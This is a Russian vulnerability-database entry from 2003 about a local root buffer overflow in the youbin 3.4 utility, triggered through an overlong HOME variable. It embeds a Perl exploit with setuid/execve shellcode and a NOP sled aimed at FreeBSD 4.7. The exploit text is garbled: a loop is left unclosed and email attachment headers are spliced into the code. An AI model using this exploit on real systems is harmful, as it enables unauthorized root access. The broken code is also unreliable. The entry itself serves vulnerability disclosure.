Дата публикации: | 12.05.2003 |
Всего просмотров: | 997 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в утилите 'youbin'. Локальный пользователь может выполнить произвольный код с root привилегиями.
Локальный пользователь может присвоить переменной HOME чрезмерно длинное, специально обработанное значение, чтобы вызвать переполнение буфера и выполнить произвольный код на системе с root привилегиями. Пример: #!/usr/bin/perl # DSR-youbin.pl - kokaninATdtors.net vs. /usr/ports/mail/youbin # offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV # shellcode by eSDee, he's cool # youbin-3.4 Mail arrival notification service package $len = 512; $ret = pack("l",0xbfbffd68); $nop = "\x90"; $shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68". "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50". "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; for ($i = 0; $i < $len - length($shellcode); $i++) { $buffer .= $nop; $buffer .= $shellcode; local($ENV{'EGG'}) = $buffer; local($ENV{'HOME'}) = $ret x 259; system("youbin"); ------=_NextPart_000_004D_01C313DA.0BD3E420 Content-Type: text/plain; name="DSR-youbin.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="DSR-youbin.txt"Уязвимость обнаружена в youbin 3.4 |
Ссылки: | youbin local root exploit + advisory |